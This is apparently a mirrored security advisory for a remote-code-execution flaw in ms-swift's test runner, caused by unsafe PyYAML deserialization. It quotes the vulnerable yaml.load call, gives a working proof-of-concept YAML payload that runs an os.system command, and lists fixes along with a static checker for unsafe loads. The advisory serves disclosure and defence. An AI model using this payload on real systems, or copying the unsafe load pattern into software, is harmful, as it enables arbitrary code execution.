exploitDog

GHSA-fm6c-f59h-7mmg

Published: 31 Jul 2025
Source: github
Github: Reviewed
CVSS4: 2.3
CVSS3: 9.8

Description

MS SWIFT Remote Code Execution via unsafe PyYAML deserialization

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

Vulnerable Code

    if args.run_config is not None and Path(args.run_config).exists():
        with open(args.run_config, encoding='utf-8') as f:
            run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

    !!python/object/new:type
    args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
    listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

    import yaml

    with open("exploit.yaml", "r") as f:
        cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

  • Replace yaml.load() with yaml.safe_load()
  • Upgrade PyYAML to version 5.4 or later

Example Fix:

    # Before
    yaml.load(f, Loader=yaml.FullLoader)

    # After
    yaml.safe_load(f)
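
An added check, not part of the advisory or the ms-swift code: a standard-library audit that applies the mitigation above across a code base by flagging every yaml.load / yaml.load_all call that does not pass a safe loader. The function names, the SAFE_LOADERS allow-list and the sample source are assumptions made for illustration, and the check only matches calls written through the module name yaml.

```python
import ast

# Assumed allow-list for this check: loaders that build only plain YAML types.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}

def _loader_name(call):
    """Name of the Loader passed to a yaml.load call, or None if absent or not a simple name."""
    node = call.args[1] if len(call.args) >= 2 else None  # positional Loader
    for kw in call.keywords:
        if kw.arg == "Loader":
            node = kw.value
    if isinstance(node, ast.Attribute):
        return node.attr  # yaml.FullLoader -> "FullLoader"
    if isinstance(node, ast.Name):
        return node.id    # from yaml import FullLoader
    return None

def find_unsafe_yaml_loads(source):
    """Return sorted (line, loader) pairs for yaml.load/load_all calls without a safe loader."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        func = getattr(node, "func", None)
        if not (isinstance(node, ast.Call) and isinstance(func, ast.Attribute)):
            continue
        # Only calls spelled yaml.load / yaml.load_all; import aliases are out of scope here.
        if func.attr not in ("load", "load_all") or getattr(func.value, "id", None) != "yaml":
            continue
        loader = _loader_name(node)
        if loader not in SAFE_LOADERS:
            findings.append((node.lineno, loader or "<default or unknown>"))
    return sorted(findings)

# Constructed sample source: the advisory's call pattern, the fixed call, and a bare yaml.load.
SAMPLE = '''\
import yaml

def read_config(args):
    with open(args.run_config, encoding='utf-8') as f:
        return yaml.load(f, Loader=yaml.FullLoader)

def read_config_fixed(f):
    return yaml.safe_load(f)

def read_legacy(f):
    return yaml.load(f)
'''

if __name__ == "__main__":
    for line, loader in find_unsafe_yaml_loads(SAMPLE):
        print(f"line {line}: yaml.load with {loader}")
```

The sample is only parsed, never executed, so the check runs without PyYAML installed.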

Author

Packages

Name: ms-swift (pip)
Affected versions: <= 3.6.3
Fixed version: None

EPSS

Percentile: 83%
0.02032
Low

CVSS4: 2.3 Low

CVSS3: 9.8 Critical

Weaknesses

CWE-502

Related vulnerabilities

CVSS3: 9.8
nvd
6 months ago

A remote code execution (RCE) vulnerability exists in the ms-swift project version 3.3.0 due to unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1). If an attacker can control the content of the YAML configuration file passed to the --run_config parameter, arbitrary code can be executed during deserialization. This can lead to full system compromise. The vulnerability is triggered when a malicious YAML file is loaded, allowing the execution of arbitrary Python commands such as os.system(). It is recommended to upgrade PyYAML to version 5.4 or higher, and to use yaml.safe_load() to mitigate the issue.
